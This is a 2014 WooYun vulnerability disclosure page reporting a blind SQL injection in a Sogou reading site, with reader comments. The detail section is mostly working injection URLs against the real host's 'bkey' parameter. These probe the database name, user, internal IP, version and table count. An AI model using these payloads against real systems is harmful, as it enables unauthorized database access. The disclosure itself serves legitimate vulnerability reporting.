当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-064595

漏洞标题:搜狗某站点存在SQL注入漏洞

相关厂商:搜狗

漏洞作者: 梧桐雨

提交时间:2014-06-12 10:38

修复时间:2014-06-17 10:39

公开时间:2014-06-17 10:39

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-12: 细节已通知厂商并且等待厂商处理中
2014-06-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

SQL,php字符类型盲注。

详细说明:

存在问题的站点:http://yuedu.sogou.com
搜狗的阅读站点。
通过and 1=2 and 1=1返回不一进行盲注。
当:and 1=1时
http://yuedu.sogou.com/ajax/user/buy/?bkey=8EFEF77F4EB2AC17BA4028A98BC0D0F6' and 1=1 and '1'='1

1.jpg


当:and 1=2时:

2.jpg


猜db长度
http://yuedu.sogou.com/ajax/user/buy/?bkey=8EFEF77F4EB2AC17BA4028A98BC0D0F6' and (length(database())=3) and '1'='1
为3
进一步猜测database名:
http://yuedu.sogou.com/ajax/user/buy/?bkey=8EFEF77F4EB2AC17BA4028A98BC0D0F6%27%20and%20(select%20ascii
(substring(database(),1,1))%20=%20119)%20and%20%271%27=%271
第一个字为w
以此类推:
database()为wap。

漏洞证明:

进一步,猜测user()
http://yuedu.sogou.com/ajax/user/buy/?
bkey=8EFEF77F4EB2AC17BA4028A98BC0D0F6%27%20and%20(length%20(user())
=16)%20and%20%271%27=%271
长度为16
进一步猜解。得:wap@10.14.138.68
http://yuedu.sogou.com/ajax/user/buy/?
bkey=8EFEF77F4EB2AC17BA4028A98BC0D0F6%27%20and%20(select%20ascii
(substring(version(),1,1))%20=%2053)%20and%20%271%27=%271
mysql版本5.0
http://yuedu.sogou.com/ajax/user/buy/?
bkey=8EFEF77F4EB2AC17BA4028A98BC0D0F6%27%20and%20(select%20count
(1)%20from%20information_schema.tables)=5232%20and%20%271%27=%271
居然有5232张表..
不继续了

修复方案:

过滤。

版权声明:转载请注明来源 梧桐雨@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-06-17 10:39

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2014-06-13 17:14 | nony ( 路人 | Rank:28 漏洞数:13 | Not do is die...)

    这个洞估计要被忽略

  2. 2014-06-18 20:09 | Manning ( 普通白帽子 | Rank:559 漏洞数:78 | 就恨自己服务器太少)

    洞主技术真好,不知如何找到的sql注射点?

  3. 2014-06-25 21:38 | clown岩 ( 实习白帽子 | Rank:42 漏洞数:13 | 哎呀 谁的肥皂? 各位大牛多多关照!陪聊 ...)

    这个洞我之前提交过sogou安全中心 3积分偶也、、、

  4. 2014-07-11 22:13 | Vty ( 普通白帽子 | Rank:199 漏洞数:37 )

    @clown岩 @梧桐雨 大牛们,搞基好吗?